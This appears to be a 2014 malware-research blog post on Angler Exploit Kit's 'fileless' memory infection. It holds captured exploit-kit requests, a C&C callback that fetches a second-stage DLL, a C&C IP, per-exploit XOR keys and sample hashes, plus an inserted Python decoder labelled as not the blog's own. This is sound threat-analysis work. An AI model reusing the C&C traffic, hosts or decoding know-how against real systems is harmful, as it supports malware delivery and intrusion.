2014-08-31 - Evolution

Angler EK : now capable of "fileless" infection (memory malware)

Matrix - Agent Jackson avoiding bullets



A few days ago I spotted a new pattern in some Angler EK threads :


New pattern in a Vawtrak Thread from Angler EK
Fired : CVE-2013-2551 - 2014-08-28


New pattern in another Vawtrak Thread from Angler EK
Fired : CVE-2014-0515 - 2014-08-29
GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1
Accept: */*
Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: rwvs30r2zq.akdnbfb.com
Connection: Keep-Alive



Wondering what it was and going over different infection paths, I spotted only one thread without this "new" count?b. [Note : on 2014-08-31 count?b appeared on that thread too]

Angler EK - 2014-08-28
"Memory Malware" thread


Exploits' hashes were the same as on all other threads, but my usual tools were not able to gather the payload, and what surprised me more is that HIPS (like Faronics Anti-Executable) were bypassed (note : I tried Malwarebytes Anti-Exploit and it was able to spot the ROP and stack pivoting).
I spent some time figuring out what was happening here :

Angler EK is now able to infect a host without writing the malware to the drive (it is injected directly into the process running the exploited plugin).

Angler EK (no landing on this screen, CVE-2014-0515 fired) and Call back from the malware injected in Internet Explorer
2nd Stage drop : 275c5f650261e80d864faf7cc6b70774 injecting itself into explorer and
then gathering Necurs from the same C&C (e.g. : be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28 , b0e3e860a2dc62cb40fd6ef897ad592b - 2014-08-29 , 5830dfde30873176d05604677bab6bd9 - 2014-08-30)


FileReplaceA "flood" operation

Malware call back in https to koqpisea.in :
217.23.3.204
49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM

Call for 2nd Stage payload looks like :

POST https://koqpisea.in/ HTTP/1.1
Host: koqpisea.in
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache

{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}


This feature opens a wide range of possibilities. Aside from being a powerful way to bypass some AV and an ideal way to run a one-time stealer or loader (Pony, Jolly Roger, Andromeda, Smoke Bot, etc.), it also allows a detailed check of the infected host before getting a little noisier and writing anything to disk. It also makes it difficult to grab the dropper (you have to carve it from memory or from the recorded traffic and then decode it). This is a powerful move for the attack side.


Additional illustrations :

Injected plugin-container calling C&C after successful "memory malware" infection
via Silverlight on Firefox and Windows 7
2014-08-30



Image : Courtesy of Will Metcalf from Emerging Threats
Java calling payload then "Memory payload" activity captured by his Cuckoo instance
2014-08-28
<edit>

The encoded stream, which usually contains the XORed + byte-shifted malware, is different in this configuration.

In Angler each exploit has its own Xor key :

Xor key in Angler  "fileless" thread CVE-2014-0515 stream 


CVE-2013-2551 = "adR2b4nh"
CVE-2014-0515 = "wT6QtySY"
CVE-2014-0322 = "laspfnfd"
Java = "FroSHu9h"
Silverlight = "aldonjfg"

The stream now starts with a XORed shellcode (which has been spotted by EKWatcher as early as 2014-08-18 in a thread fed by Adnxs (AppNexus) malvertising).

32 bits version of the stream after a XOR pass.
First part is a Shellcode.
Second part is a Dll
After a XOR and split operation (Disclaimer : it might not be enough to get the real DLL, as Angler has a history of doing more than just a XOR)

Stream Shellcode 32bits
Xored MZ part : 32f4a876c1819713d13e1d14d8cb0a02
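Added here as a worked example (not the blog's own tooling): a small Python decoder that tries the per-exploit XOR keys listed above, locates the MZ/PE header that follows the shellcode, and splits the stream in two. The sample stream is constructed inline, and the DOS-header check is my own heuristic; as the post cautions, a single XOR pass may not be sufficient on real Angler streams.

```python
"""Recover shellcode + DLL from an Angler-style XOR-encoded stream.

Added example, not the post's own code. Keys come from the post; the
sample stream is constructed here; the PE check is a heuristic assumption.
"""
import struct
from itertools import cycle
from typing import Optional

# Per-exploit XOR keys as listed in the post.
ANGLER_KEYS = {
    "CVE-2013-2551": b"adR2b4nh",
    "CVE-2014-0515": b"wT6QtySY",
    "CVE-2014-0322": b"laspfnfd",
    "Java": b"FroSHu9h",
    "Silverlight": b"aldonjfg",
}


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (symmetric, so it also encodes)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def find_pe_offset(data: bytes) -> int:
    """Offset of the first plausible PE image: an 'MZ' header whose
    e_lfanew (DOS header offset 0x3C) points at 'PE\\0\\0'. -1 if none."""
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            nt = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and data[nt:nt + 4] == b"PE\x00\x00":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return -1


def split_stream(encoded: bytes) -> Optional[dict]:
    """Try each known key; return exploit name, shellcode and DLL on success."""
    for name, key in ANGLER_KEYS.items():
        plain = xor_repeating(encoded, key)
        off = find_pe_offset(plain)
        if off > 0:  # the shellcode precedes the DLL, so offset must be > 0
            return {"exploit": name, "shellcode": plain[:off], "dll": plain[off:]}
    return None  # a plain XOR pass was not enough (or an unknown key)


# Constructed stand-in for a captured stream: 16 bytes of fake shellcode,
# then a minimal fake PE header (e_lfanew = 0x40 -> 'PE\0\0'), XORed with the
# CVE-2014-0515 key from the post.
_FAKE_SHELLCODE = bytes(range(0x90, 0xA0))
_FAKE_DLL = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 12
SAMPLE_STREAM = xor_repeating(_FAKE_SHELLCODE + _FAKE_DLL, ANGLER_KEYS["CVE-2014-0515"])
```

On a real capture, pass the raw encoded body to `split_stream` and hash the returned DLL to compare against the MD5 given above.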

That encoded DLL is the same threat as the one called after infection (waiting for a proper name by AV). String spotted : C:\Remedies\And.pdb

David Sanchez (Malwarebytes) figured out that the payload is hooking kernel32!ExitProcess,
which explains why iexplore was still loaded after the browser was closed.

If the victim's OS is 64-bit, a 64-bit shellcode and a 64-bit version of the DLL are sent instead :

Angler EK 2014-09-04 In bold Green :
- Encoded stream
- Same Distribution threat as the encoded one, downloaded from the C&C
- Asterope

Unnamed Distribution bot (64-bit variant) : 1b4cbec2a2d634ae257a760d43ba6bc5

It seems that the callback C&C is operated by the Angler EK guys and is a kind of "Distribution botnet" (or a loader in "CaaS" mode).
</edit>

Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advice.
Thanks to EkWatcher and David Sanchez (Malwarebytes) for information and an insight into the "RE" side of this thread.

Files:
 AnglerEK_MM_2014-08-31 (Fiddlers + bot + C&C calls - Owncloud)
 AnglerEK_MM_2014-09-05 (2 additional Fiddler captures, 64-bit streams and C&C callback - Owncloud)

 If you want to play with Volatility or whatever, here is the memory dump (Mega) of a VM taken while IE was injected and calling the C&C (IE pid : 860)

Capture of Fiddler just before pausing the VM
2014-08-30
<edit 2014-09-26>
</edit>


<edit 2014-09-29>

</edit>


Read More:  
The Hunt for Memory Malware - 2013-11-06 - Albert Fruz
In-Memory Execution of an Executable - Amit Malik  - SecurityXploded
A unique 'bodiless' bot attacks news site visitors - 2012-03-06 - Sergey Golovanov - Securelist